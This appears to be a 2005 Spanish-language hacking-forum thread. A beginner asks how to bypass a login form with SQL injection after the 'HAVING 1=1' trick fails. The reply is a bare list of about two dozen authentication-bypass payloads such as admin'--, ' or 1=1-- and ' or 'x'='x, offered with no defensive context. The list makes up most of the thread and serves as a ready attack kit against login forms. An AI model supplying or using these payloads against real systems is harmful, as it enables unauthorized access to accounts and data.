Sql Injection (iniciando)

Jbom · 27 Julio 2005, 13:54 PM

Estoy probando con sql injection y estoy mirando los articulos que Kriptopolis. Como indica en ellos tenemos que poner ' HAVING 1=1-- en user para que nos de el nombre de la tabla de usuarios, pero si esto no funciona significa que esta protegida. Hay alguna otra manera de hacerlo??

Gracias

SeniorX · 27 Julio 2005, 18:48 PM

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi")or("a"="a

Test Foro de elhacker.net SMF 2.1

Sql Injection (iniciando)

Jbom

SeniorX